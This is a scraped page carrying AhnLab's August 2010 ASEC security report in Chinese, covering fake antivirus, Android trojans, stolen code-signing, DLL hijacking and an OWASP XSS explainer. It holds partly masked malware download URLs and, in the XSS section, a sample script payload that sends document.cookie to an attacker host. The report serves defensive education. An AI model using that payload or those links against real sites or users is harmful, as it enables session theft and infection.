White paper ahn lab trusguard utm
White paper ahn lab trusguard utmWhite paper ahn lab trusguard utm
White paper ahn lab trusguard utm
ahnlabchina
 
Manual instruction apc3.0
Manual instruction apc3.0Manual instruction apc3.0
Manual instruction apc3.0
ahnlabchina
 
Manual instruction apc4.0
Manual instruction apc4.0Manual instruction apc4.0
Manual instruction apc4.0
ahnlabchina
 
Brochure ahn lab trusguard utm
Brochure ahn lab trusguard utmBrochure ahn lab trusguard utm
Brochure ahn lab trusguard utm
ahnlabchina
 
Brochure ahn lab-soc
Brochure ahn lab-socBrochure ahn lab-soc
Brochure ahn lab-soc
ahnlabchina
 
Commercial model quality
Commercial model qualityCommercial model quality
Commercial model quality
ahnlabchina
 
Commercial model program license
Commercial model program licenseCommercial model program license
Commercial model program license
ahnlabchina
 
Commercail model apc license model
Commercail model apc license modelCommercail model apc license model
Commercail model apc license model
ahnlabchina
 
Commercial model technical
Commercial model technicalCommercial model technical
Commercial model technical
ahnlabchina
 
Commercial model postsales services
Commercial model postsales servicesCommercial model postsales services
Commercial model postsales services
ahnlabchina
 

Mehr von ahnlabchina (20)

安博士Utm性能参考
安博士Utm性能参考安博士Utm性能参考
安博士Utm性能参考
 
Training apc-4.0
Training apc-4.0Training apc-4.0
Training apc-4.0
 
Training apc-3.0
Training apc-3.0Training apc-3.0
Training apc-3.0
 
Training apc-3.0
Training apc-3.0Training apc-3.0
Training apc-3.0
 
Training ahn lab-scm
Training ahn lab-scmTraining ahn lab-scm
Training ahn lab-scm
 
Training ahn lab-scm
Training ahn lab-scmTraining ahn lab-scm
Training ahn lab-scm
 
White paper apc3.0
White paper apc3.0White paper apc3.0
White paper apc3.0
 
White paper apc4.0
White paper apc4.0White paper apc4.0
White paper apc4.0
 
White paper ahnlab scm
White paper ahnlab scmWhite paper ahnlab scm
White paper ahnlab scm
 
White paper ahn lab trusguard utm
White paper ahn lab trusguard utmWhite paper ahn lab trusguard utm
White paper ahn lab trusguard utm
 
Manual instruction apc3.0
Manual instruction apc3.0Manual instruction apc3.0
Manual instruction apc3.0
 
Manual instruction apc4.0
Manual instruction apc4.0Manual instruction apc4.0
Manual instruction apc4.0
 
Brochure apc4.0
Brochure apc4.0Brochure apc4.0
Brochure apc4.0
 
Brochure ahn lab trusguard utm
Brochure ahn lab trusguard utmBrochure ahn lab trusguard utm
Brochure ahn lab trusguard utm
 
Brochure ahn lab-soc
Brochure ahn lab-socBrochure ahn lab-soc
Brochure ahn lab-soc
 
Commercial model quality
Commercial model qualityCommercial model quality
Commercial model quality
 
Commercial model program license
Commercial model program licenseCommercial model program license
Commercial model program license
 
Commercail model apc license model
Commercail model apc license modelCommercail model apc license model
Commercail model apc license model
 
Commercial model technical
Commercial model technicalCommercial model technical
Commercial model technical
 
Commercial model postsales services
Commercial model postsales servicesCommercial model postsales services
Commercial model postsales services
 

安博士Asec 2010年8月安全报告

  • 1. 2010 ASEC Report Vol.08 安博士公司的安全响应中心(ASEC, AhnLab Secur ity Emergency Response Center)是以病毒分析师 及安全专家组成的全球性安全响应组织。此报告书 是由安博士公司的ASEC制作,且包含每月发生的主 要安全威胁与响应这些威胁的最新安全技术的简要 信息。 详细内容可以在[www.ahn.com.cn]里确认。 ASEC 2010-09-13
  • 2. I. 本月安全疫情 1. 病毒趋势…………………………………………………………3 2. 安全趋势…………………………………………………………10 3. 网络安全趋势……………………………………………………17
  • 3. Ⅰ. 每月安全趋势 1. 病毒趋势 ■ 诱导安装虚假杀毒软件的邮件 本月最流行的木马是通过附加到邮件的执行文件或脚本文件来进行传播的虚假杀毒软 件。 邮件格式如下: [图 1-1] 诱导安装虚假杀毒软件的邮件 脚本文件一般是以加密的形式来附加到邮件,因此很难辨别出其包含的内容。 而且此 类文件是.html 文件格式,用户会很容易中招。如执行该文件,会连接到包含 Windows 帮助文档漏洞的网站。目前发现的此类文件很多会连接成人用品广告网站。 附加到邮 件的可执行文件一般安装以下虚假杀毒软件。
  • 4. [图 1-2] 虚假杀毒软件 最近通过邮件来进行传播的虚假杀毒软非常流行。 我们认为这些虚假杀毒软件是通过 僵尸网络进行传播的。我们推测通过僵尸网络进行传播的虚假邮件和垃圾邮件会更加 疯狂。 所以如受到此类邮件,直接删除也是一种很好的预防措施。 ■ 伪装成正常杀软的虚假杀软 本月发现伪装成正常杀毒软件的虚假杀毒软件。 一旦用户打开网页浏览器,该虚假 杀毒软件会弹出以下警告窗口。可以看到该杀毒软件伪装成有名杀毒软件的界面。 [图 1-3] 伪装正常杀毒软件检测结果的界面
  • 5. 如用户点击‘Apply actions’,会弹出虚假的修复界面。但是实际上不会进行删除或 修复。之后虚假杀毒软件显示如下界面,有些还伪装成有名的在线文件检测网站 Virus total。 其他变种的界面如下: [图 1-4] 诱导安装虚假杀毒软件的界面 [图 1-4]里标记为 Free Install 的杀毒软件是虚假杀毒软件。 Red Cross Peak Protection 2010 Pest Detector Major Defense Kit Antispysafequard 而且其他杀毒软件的检测结果也是伪装的,希望用户不要被此上当受骗。虚假杀毒软 件逐渐进化,越来越隐蔽地给用户造成损失。如上介绍过,有些虚假杀毒软件还开始 伪装成有名的正常杀毒软件。虽然虚假杀毒软件在安全领域是很老的话题, 但是因受 到金钱的诱惑,病毒制作者会持续精密设计自己的虚假杀毒软件,所以我们继续会关 注此类案件。 ■ 智能手机病毒的出现
  • 6. 2010 年 8 月开始发现驻留于基于 Android 平台智能手机的病毒。8 月份发现 3 种类型 的 基 于 Android 平 台 的 智 能 手 机 。 Android-Trojan/Ewalls 会不经过用户同意泄漏 SIM 等个人敏感信息。制作公司辩解称是为了开发更优秀的软 件而收集信息,但是有些敏感信息是可能会违法。关于该病毒下面会详细解释。 Android-Trojan/SmsSend 是伪装成视频播放器的病毒,实际上并不包含视频播放 功能 。 它的主要功能是不经过用户同意,向收费 SMS(Short Message Service) 发送消息。Android-Trojan/Snake 是伪装成游戏,并泄漏用户的位置信息 的 木 马 。 实际具有游戏功能,但是玩游戏时不经过用户同意传送用户的位置信息。本月发现的 智能手机病毒都是运行在 Android 平台上的木马,而且具有不经过用户同意传送个人 信息的功能。用户下载智能手机应用程序并安装以前,必须得明确的确认,而且要仔 细查看以往用户的评价,确认没有恶意因素以后再进行安装。 ■ Android 背景界面应用程序里插入的病毒代码 V3 Mobile 产品里诊断为 Android-Spyware/EWalls 的 Android 背景软件里发现泄漏 个人信息的功能。图 1-5 是运行诊断名为 Android-Spyware/EWall 的应用程序时截取 的界面。 [图 1-5] 应用程序运行界面 运行具有信息泄漏功能(图 1-5)的恶意应用程序时会收集用户信息,并通过网络发 送 。 以下图 1-10 是 V3 Mobile 产品里检测为 Android-Spyware/Ewalls 的恶 意应用程序。
  • 7. [图 1-6] V3 Mobile 产品里检测恶意应用程序时的界面
  • 8. ■ 盗用卡巴电子签名的病毒 最近国外发现盗用电子签名的病毒。7 月份在韩国也发现为了在各大门户网站上进行 传播,伪造某企业电子签名的木马。 但是这次所发现的木马所使用的伪造签名方式, 于以往伪造普通企业签名的手法有所不同,使用的是卡巴斯基的签名。 [图 1-7] 盗用卡巴斯基签名的木马 这次发现的木马所使用的所有卡巴斯基电子签名都过了有效期。所以可以把有效期作 为判断木马的参考。但是如果木马伪造一般企业的电子签名或盗取实际使用在签名里 的密钥时问题会变的很严重。实际上 7 月 19 日所发现的利用 Windows Shell 漏洞的 Stuxnet,其 Rootkit 驱动文件使用某特定企业的加密密钥做了签名。伪装卡巴斯基电 子签名的木马在 V3 产品群里的诊断名如下: Win-Trojan/Zbot.117736 Win-Trojan/Agent.122856.B Win-Trojan/Zbot.138216
  • 9. 伪装成虚假 Adobe Flash Player 升级的恶意代码 在 8 月 11 日,发现了从海外制作的虚假 Adobe Flash Player 升级包通过网站传播恶 意代码。本次被发现的虚假 Adobe Flash Player 升级网站是 Adobe 公司为了解决最 新漏洞,发布安全更新时发现的。所以需要大家注意。虚假 Adobe Flash Plyaer 升 级包网站制作成真实的 Adobe Flash Plyaer 升级官网一样,在一般用户的角度上具 有难以判别是不是虚假的特点。 [图 1–8] 虚假 Adobe Flash Player 升级网站 在该虚假网站上点击上面标红色区域块会下载以下如 install_flash_player.exe (25,088 字节) 的文件。 [图 1–9] 虚假 Adobe Flash Player 升级网站 发布的恶意代码 下载的文件是恶意代码,执行该文件在正常的 svhost.exe 文件的内存领域里注入自身 的代码而且下载安装虚假杀软其它变种恶意代码。
  • 10. 本次被发现的虚假 Adobe Flash Player 升级网站中发布的恶意代码在 V3 产品系列诊 断为如下: Win-Trojan/Injector.25088.K 有了像这次通过虚假网站发布恶意代码的实例后,升级软件时应当通过该产品直接进 行升级,或通过网站进行升级时,事先确认好网站地址,是不是该产品的官方网站。 需用户谨慎注意。
  • 11. 2. 安全趋势 ■ ATM(自动柜员机, AutomatedTeller Machine)漏洞 本次在 BlackHat2010 和 DEFCON18 上 发表了 ATM 存在漏洞的内容。发表者 在现场给 大家演示攻击 ATM 并在画面上显示 JackPot,而且惊人的是在 ATM 机械上出无数的钞 票。 [图 2-1] ATM 攻击试验现场 (图片-wired.com) 攻击类型大致分为 , 利用 ATM 管理功能漏洞远程攻击方法和 ATM 机械自身连接 USB 端口等攻击。在发表中关于自身漏洞上按照技术角度上没有详细的说明但是足以证明 的一点是跟电脑一样同样可以受到攻击的。 [图 2-2] 被攻击的 ATM 状况 (图片-securityweek.com)
  • 12. 幸亏 发表者所发现的漏洞没有应用在所有 ATM 机械上而是指定的机械,该漏洞已经告 诉给 ATM 制作者而且解决此楼哦对那个。但是不仅仅该 ATM 机械,还有其他的 ATM 制 造商也存在同样的问题所以需要关注。 ■ DLL Hijacking 漏洞 最近报道最新漏洞信息的网站上有很多关于DLL劫持相关的内容。 应用程序在不指定完全限定路径的情况下动态加载DLL时,Windows将尝试在一组明确 定义的目录中查找此DLL。这组目录称为DLL搜索路径。Windows在目录中找到该DLL后 就会加载该DLL。如果Windows按DLL搜索顺序没有在任何目录中找到DLL,则会在DLL在 家操作返回一个失败结果。 LoadLibrary函数和LoadLibraryEx函数用于动态加载DLL。下面是着两个函数的DLL搜 索顺序。 1. 程序执行目录 2. 系统目录 3. 16位系统目录 4. Windows目录 5. 当前工作目录 (CWD) 6. PATH环境变量中列出的目录 [图 2-3] DLL Hijacking 劫持 利用新引入的 CWDIllegalInDllSearch 注册表项 , 计算机管理员可以修改 LoadLibrary 和 LoadLibraryEx 所使用的 DLL 搜索路径算法的行为。此注册表 项可以允许跳过某些类型的目录。 可以在以下路径中添加 CWDIllegalInDllSearch 注册表项: 将此注册表项用于计算机上的所有应用程序: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession Manager
  • 13. 将此注册表项用于计算机上的特定应用程序: HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionImage File Execution Options<application binary name> 每应用程序注册表项始终覆盖系统范围设置。这允许严格设置系统范围设置。然 后,可以为没有正确使用系统范围设置的任何应用程序设置应用程序设置。 例如,管理员可以通过将系统范围的设置设置为 2 来阻止从 WebDAV 和 SMB 加 载 DLL,然后再通过将“图像文件执行选项”设置为 0 或 1 来更改要求此加载 行为的特定应用程序的行为。 CWDIllegalInDllSearch 注册表项的值按如下方式修改 LoadLibrary 和 LoadLibraryEx 的行为 ■ 命令窗口游戏平台上运行的恶意代码 在DEFCON18 上发表了能在嵌入式系统运行的恶意代码相关的文章。此发表中,利用命 令窗口游戏机 NDS 和Wili如电脑一样可以麻痹网络 也可以攻击它人的机器,还有非 法下载游戏并运行,导致被感染的用户会受到不小的影响 [图 2-4] 原游戏病毒头 [图 2-5] 恶性代码嵌入的病毒头 还有,在电脑中运行的病毒一样,就像在嵌入式系统中运行自己想添加的代码,通告 在嵌入式系统中发生运行的代码,直接运行已被在Wii运行的病毒感染的游戏。发表者 制作的病毒是攻击home网络的共享器和用户电脑,麻痹网络,使用户电脑成为zommbie PC来添加到攻击者的Botnets.
  • 14. [图 2-6] 通过被感染的游戏攻击 home 网络的演示 不仅仅是游戏机,最近国内有使用的 iPhone, Android phone 和同类 smart phone 也 发生类似的事情。所有要注意在网络违法共享的应用程序也会嵌入恶性代码。在这次 发表所主张的一样,从以前的 console 游戏机,在嵌入式系统也会像电脑不仅对自己 同时还会给其他人带来造成极大的影响,违法下载应用程序来使用的时候,由于恶性 代码不仅对嵌入式系统,还会对自己电脑及他人电脑,甚至对网络都会有着很大影 响。 ■ Imm32.dll patched 的恶性代码增加 在 8 月末,同样也出现了 patched imm32.dll 的恶性代码以及有着 AV-Killer 功能的 恶性代码。
  • 15. [图 2-7] patched imm32.dll 的恶性代码周期 2010-08-21 ~ 2010-08-22 http://wow.*******.com/script/movie_ativex_patch.js http://*******.com/ads.htm http://*******.com/K.js http://*******.com/y.exe 2010-08-13 ~ 2010-08-16 http://wow.*******.com/script/movie_ativex_patch.js http://*******.com/a.htm http://*******.com/K.js http:/*******.com/n.exe [图 2-8] patched imm32.dll 的恶性代码内容
  • 16. [图 2-9] patched imm32.dll 恶性代码状况(V3Lite 标准) 在[图 2-11]所说明的状况是仅在周末所发生的,到目前为止所奇迹的内容来说,比起 平时 PC 使用量也会增多,被感染的 PC 也没有及时进行升级。通过被攻击的网站蔓延 的恶性代码还会利用 MS10-042 漏洞的示例也会发生,所以用户要对此给予重视并且要 定期进行安全升级。
  • 17. 3. 网络安全动向 ■ OWASP 2010 TOP 2 Vol.07 是查看在 Vol.06 里概括查看的 OWASP 2010 Top10。来看一下 OWASP 2010 Top 2 XSS 攻击。 首先 XSS 攻击主要事项看一下下面图片。 [图 3-1] XSS 概括 1) 主要内容 Threat Agents(攻击者) : 包括内,外部用户,管理者。 发送一下无法信赖 的数据。 Attack Vectors(攻击路径) : 攻击者会传送在浏览器可以恶用 interpreter 的以 text 为基础的攻击代码。数据库里的数据和同样的内部代码都会被使用 为攻击路径。 Security Weakness(安全漏洞) : XSS 是广为人知的应用程序安全漏洞。XSS 漏洞是不会对应用程序做适当检查以及限制,用户所提供的数据包含在浏览器 传送的网页时发生的。XSS 是 Stored, Rflected 还有 DOM 基础的 XSS, 3 中 形式。大部分的 XSS 缺点是通过 text 或者代码分析,很容易了解到的。 Technical Impacts(技术影响) : 攻击者是利用用户 session 劫持,网页编 造,恶性 contents 注入,用户重定向,使用恶性代码,利用恶性代码来劫持 用户浏览器等来执行用户浏览器脚本。
  • 18. Business Impacts(Business 影响) :顾虑受影响的系统和处理的所有数据的 Business 价值。并且也要顾虑漏洞对攻击所造成的影响。 2) 注入攻击例子 这个应用程序会没有检测或限制无法信赖的数据就是用 HTML 的。 (String) page += "<input name='creditcard' type='TEXT‘value='" + request.getParameter("CC") + "'>"; 攻击者是在浏览器修改如下‘CC’变量: '><script>document.location='http://www.attacker.com/cgi- bin/cookie.cgi?foo='+document.cookie</script>'. 还要注意攻击者可以利用 XSS 使 CSRF 防御失效。 3) 对应方法 要分离活性浏览器 contents 和无法信赖的数据。 提倡的方法是要限制无法信赖的数据包含的 HTML(body,attribute,javascrip t,CSS,URL)。在 UI Framework 里不执行限制处理,开发者要在应用程序中包 含限制处理。 适当的正规化与解码来执行正确或者检查white list来保护XSS,但是输入时 会需要特殊文字,所以不是一个完美的对应方法。像这样的情况,在允许输入 前把加密的所有输入进行解密,来检测长度、文字、初始化、数据相关的业 务。 到目前为止,对 OWASP 2010 TOP2 XSS 了解里一下。查看一下 refenrence。
  • 19. [Reference] OWASP •OWASP XSS Prevention Cheat Sheet •OWASP Cross-Site Scripting Article •ESAPI Project Home Page •ESAPI Encoder API •ASVS: Output Encoding/Escaping Requirements (V6) •ASVS: Input Validation Requirements (V5) •Testing Guide: 1st 3 Chapters on Data Validation Testing •OWASP Code Review Guide: Chapter on XSS Review External •CWE Entry 79 on Cross-Site Scripting •RSnake’sXSS Attack Cheat Sheet